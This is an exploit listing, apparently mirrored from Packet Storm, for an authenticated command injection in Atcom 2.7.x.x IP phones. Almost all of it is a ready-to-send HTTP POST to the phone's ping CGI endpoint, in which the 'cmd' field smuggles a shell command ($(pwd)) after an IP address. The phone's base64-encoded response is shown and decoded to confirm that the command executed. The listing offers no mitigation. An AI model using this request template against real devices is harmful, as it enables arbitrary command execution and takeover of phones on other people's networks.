Share
## https://sploitus.com/exploit?id=PACKETSTORM:175016
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection  
# Google Dork: N/A  
# Date: 07/09/2023  
# Exploit Author: Mohammed Adel  
# Vendor Homepage: https://www.atcom.cn/  
# Software Link:  
https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html  
# Version: All versions above 2.7.x.x  
# Tested on: Kali Linux  
  
  
Exploit Request:  
  
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1  
Host: {TARGET_IP}  
User-Agent: polar  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 49  
Authorization: Digest username="admin", realm="IP Phone Web  
Configuration", nonce="value_here",  
uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",  
response="value_here", qop=auth, nc=value_here, cnonce="value_here"  
  
cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping  
  
  
Response:  
  
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}  
  
The value of "ping_cmd_result" is encoded as base64. Decoding the  
value of "ping_cmd_result" reveals the result of the command executed  
as shown below:  
  
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'